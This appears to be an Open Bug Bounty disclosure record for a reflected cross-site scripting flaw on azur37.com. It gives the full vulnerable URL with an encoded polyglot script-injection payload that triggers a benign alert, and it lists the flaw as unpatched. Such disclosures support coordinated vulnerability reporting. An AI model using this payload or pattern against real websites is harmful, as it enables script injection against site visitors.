azur37.com XSS vulnerability

2016-06-22T09:43:00
ID: OBB:160740
Type: openbugbounty
Reporter: XSSbot
Modified: 2016-06-29T15:12:00

Description

Vulnerable URL:
http://www.azur37.com/recherche-camping-car/?neuf_/_occasion=%5B%27%27%5D&type;=%5B%27%27%5D&prix;=%5B%27prix%20inf%5Cxc3%5Cxa9rieur%20%5Cxc3%5Cxa0%27%5D&marque;=%5B%27%27%5D%27%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%27%3Balert%28String.%20fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%22%3Balert%28String.fromCharCode%20%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%22%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F--%20%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%20%3C%2FSCRIPT%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 2265408
VIP website status:| No
azur37.com SSL connection grade:| F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 June, 2016 09:43 GMT
Vulnerability existence verified and confirmed| 22 June, 2016 15:05 GMT
Notification sent to subscribers (without technical details)| 22 June, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2016 15:12 GMT